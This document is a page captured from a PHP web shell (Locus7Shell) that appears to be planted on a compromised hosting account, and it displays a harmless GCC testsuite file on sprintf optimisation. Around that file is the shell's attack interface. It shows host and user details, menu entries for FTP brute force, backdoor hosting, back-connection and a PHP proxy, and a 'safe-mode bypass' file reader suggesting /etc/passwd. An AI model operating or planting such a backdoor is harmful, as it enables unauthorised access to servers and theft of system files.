Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/tree-ssa/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     builtin-sprintf-8.c (3.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR tree-optimization/77671 - missing -Wformat-overflow warning
   on sprintf overflow with "%s"

   Negative test verifying that sprintf family calls that must not
   be transformed into calls to other functions (such as memcpy)
   are preserved.

   { dg-compile }
   { dg-options "-O2 -Wformat -Wno-format-truncation -Wno-format-zero-length -fdump-tree-optimized" } */

void sink (char*, ...);

extern char buffer[];

/* String exactly 4100 characters long (plus the terminating NUL).  */
extern const char s4100[4101];

void test_sprintf (const char *s)
{
  /* Macros to test the function call while eignoring and using
     the return value, respectively.  */
#define IGN(...) __builtin_sprintf (buffer, __VA_ARGS__), sink (buffer)
#define USE(...) sink (buffer, __builtin_sprintf (buffer, __VA_ARGS__))

  /* All of the following calls to sprintf must be emitted (and not
     transformed into memcpy, strcpy, or similar).  */

  /* Verify that a sprintf call with output in excess of the maximum
     of 4095 bytes is not transformed into memcpy/strcpy when its
     return value is used (the call may fail with EOVERFLOW but
     the error is only detectable when the function's negative return
     value indicates errno is valid ).  */
  USE (s4100);

  USE ("%s", s4100);

  /* Same as above but with string of unknown length (which could
     be in excess of 4K long).  */
  USE (s);
  USE ("%s", s);
}


void test_snprintf (void)
{
#undef IGN
#define IGN(N, ...) __builtin_snprintf (buffer, N, __VA_ARGS__); sink (buffer)

  /* All of the following calls to sprintf must be emitted (and not
     transformed into memcpy, strcpy, or similar).  */

  /* Truncated output could be optimized into strncpy (not done yet).  */
  IGN (1, "123");
  IGN (1, s4100);

  IGN (1, "%s", "123");
  IGN (1, "%s", s4100);

  /* Output in excess of the maximum of 4095 bytes.  */
  IGN (4097, s4100);

  IGN (4097, "%s", s4100);
}


void test_vsprintf (__builtin_va_list va)
{
#undef IGN
#define IGN(fmt) __builtin_vsprintf (buffer, fmt, va); sink (buffer)

  /* All of the following calls to vsprintf must be emitted (and not
     transformed into memcpy, strcpy, or similar).  */

  /* Output in excess of the maximum of 4095 bytes.  */
  IGN (s4100);
}


void test_vsnprintf (__builtin_va_list va)
{
#undef IGN
#define IGN(N, fmt) __builtin_vsnprintf (buffer, N, fmt, va); sink (buffer)

  /* All of the following calls to vsnprintf must be emitted (and not
     transformed into memcpy, strcpy, or similar).  */

  /* Truncated output could be optimized into strncpy (not done yet).  */
  IGN (1, "123");
  IGN (1, s4100);

  /* Output in excess of the maximum of 4095 bytes.  */
  IGN (4097, s4100);
}

/* { dg-final { scan-tree-dump-times "builtin_sprintf" 4 "optimized" } }
   { dg-final { scan-tree-dump-times "builtin_snprintf" 6 "optimized" } }
   { dg-final { scan-tree-dump-times "builtin_vsprintf" 1 "optimized" } }
   { dg-final { scan-tree-dump-times "builtin_vsnprintf" 3 "optimized" } } */

#define S10    "0123456789"
#define S100   S10 S10 S10 S10 S10  S10 S10 S10 S10 S10
#define S1000  S100 S100 S100 S100 S100  S100 S100 S100 S100 S100

const char s4100[4101] = S1000 S1000 S1000 S1000 S100;

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0057 ]--